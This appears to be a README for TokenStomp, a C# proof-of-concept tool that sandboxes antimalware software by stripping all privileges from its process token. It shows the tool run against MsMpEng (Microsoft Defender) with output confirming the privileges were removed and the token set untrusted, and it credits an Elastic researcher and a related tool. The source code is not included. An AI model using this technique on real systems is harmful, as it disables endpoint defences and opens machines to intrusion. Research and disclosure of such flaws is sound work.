TokenStomp
C# POC for the token privilege removal flaw reported by @GabrielLandau at Elastic.
C:\Users\Mrtn>TokenStomp.exe MsMpEng
________ βββββββ βββββββ βββ β βββββββ ββ β βββββββ βββββββ βββββββ ββ ββ βββββββ
(____ / <| β β β β β β β β β β β β β βββ β β
(___ / <| ββ ββ β β βββ β ββββ βββ β βββββββ ββ β β β β β β
(__ / <`-------. β β β β β β ββ βββββ β ββββββ β β β β β β β βββ β
/ `. ^^^^^ | \ β β β βββ β βββ ββββ β ββββββ β β β β βββ β β β β ββββ
| \---------' | β β β β β β βββββ β β βββββββ β β β β β βββββ β β
|______|___________/] βββββ βββββββββββββ βββββββββββββ ββββββββββββ βββββ βββββββββββ βββββββ
[βββββ|`-.βββββββββ] Implemented by @Mrtn9 - Technique by @GabrielLandau
[*] Found MsMpEng with pid 4988
[*] Got handle to process
[*] Successfully opened process token
[*] Got token information
[*] Found 14 privileges in token
[*] Successfully removed 14 of 14 privileges from token
[*] Successfully set token untrusted
C:\Users\Mrtn>
Credits
- This wonderful blogpost by Gabriel Landau over at Elastic: Sandboxing Antimalware Products for Fun and Profit
- This C++ implementation by Sudheer Varma (which I wish I saw before writing my implementation...): KillDefender